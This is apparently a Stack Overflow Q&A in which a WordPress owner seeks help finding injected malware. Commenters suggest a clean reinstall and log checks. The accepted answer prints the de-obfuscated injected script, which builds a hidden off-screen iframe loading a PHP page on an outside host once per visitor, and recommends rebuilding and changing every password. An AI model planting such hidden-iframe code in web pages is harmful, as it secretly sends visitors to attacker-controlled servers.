# How to find malicous code/malware on a website

Tags: php, html, wordpress, malware

My Wordpress website recently became infected with malware and has been blacklisted. I thought I fixed it by updating the site and plugins and removing any code I didn't recognize.

I then used Sucuri Site Checker and it seemed okay, so I submitted a review request with Google. However, Google have said that it still contains malware in the form of malicous code (they referred to it as a code injection).

I am a bit lost for what to do. Is there a way to find the bit of code which Google is finding? The domain is sudorf.co.uk but it has malware so I wouldn't advise going there - no idea what the malware will be doing.

Any help would be greatly appreciated.

EDIT: I found that code a few days ago and deleted it, then I updated all versions etc. But obviously it has come back again.  Does anyone have an idea how it might be getting there. My thoughts are that its either from a plugin - which is why I am going to remove all of them. The other is the contact form - but I didn't think this would have allowed them to edit the header.php.

Comment: There's a malicious block of `<script>` right after `<body>`. It could be injected from multiple places, your best solution (as always with an infection) is to nuke it and go back to a known good version. And look up best security practices - minimize file permissions, keep up-to-date with new releases, install specialized Wordpress security plugins... But in the end Wordpress is a huge script-kiddie magnet and you will be attacked over and over simply because you run Wordpress.

Comment: Turn off all your plugins and revert to a standard theme, then get Google to retest. Add them one by one until a problem is found. Does Google not give further details (such as a URL)?

Comment: no, sadly the only details they gave related to it being a code injection.

Comment: @PectusExcavatum Plugins that add this crap to your site are **very** good at hiding the evidence that there was a flaw in the plugin to start with.

Comment: @PectusExcavatum - trying to track this down is very, very tricky, I'm afraid. I'd suggest looking through the webserver log files to see if there's anything suspicious in there, which should help if it was a code injection. If you've got an idea about when it happened, that should help narrow it down.

Comment: Your best solution is to get an experienced server admin or security professional to identify how your site was hacked. Until you know exactly how the code got on your site you cannot be sure it wont come back.

Comment: This question appears to be off-topic because it is about general programming techniques and belongs on [programmers.se]

Comment: See PHP scanner for malicious files at: https://github.com/Te-k/phpscanner

Answer (score 8, accepted):

This is pure info. Your malware looks like this when it's de-obfuscated:

```
 function k09() {
     var static = 'ajax';
     var controller = 'index.php';
     var k = document.createElement('iframe');

     k.src = 'http://dostojewskij-gesellschaft.de/VD49Jdzr.php';
     k.style.position = 'absolute';
     k.style.color = '512';
     k.style.height = '512px';
     k.style.width = '512px';
     k.style.left = '1000512';
     k.style.top = '1000512';

     if (!document.getElementById('k')) {
         document.write('<p id=\'k\' class=\'k09\' ></p>');
         document.getElementById('k').appendChild(k);
     }
 }

 function SetCookie(cookieName, cookieValue, nDays, path) {
     var today = new Date();
     var expire = new Date();
     if (nDays == null || nDays == 0) nDays = 1;
     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
 }

 function GetCookie(name) {
     var start = document.cookie.indexOf(name + "=");
     var len = start + name.length + 1;
     if ((!start) &&
         (name != document.cookie.substring(0, name.length))) {
         return null;
     }
     if (start == -1) return null;
     var end = document.cookie.indexOf(";", len);
     if (end == -1) end = document.cookie.length;
     return unescape(document.cookie.substring(len, end));
 }
 if (navigator.cookieEnabled) {
     if (GetCookie('visited_uq') == 55) {} else {
         SetCookie('visited_uq', '55', '1', '/');

         k09();
     }
 }
```

`http://dostojewskij-gesellschaft.de/VD49Jdzr.php` simply outputs "OK".

## Why?

My guess is that this is an IP/traffic logger. Maybe for the hackers to check which blogs are most active and then later come back and hack that particular site (no need to waste time on a site with 2 visitors a month). This is good and bad.

The good part is that it ***seems*** that they haven't used any of your user database or anything else.

The bad part is that they might very well have downloaded your entire database since they've obviously had executing rights on your server, and might've placed their PHP files all over your server. Your best bet is to start on a fresh WP and copy plugins/themes in one-by-one while manually checking them.

Change *all* passwords. Even your DB login. Consider **everything** compromised.

Comment: I will do just that. Thanks for all your help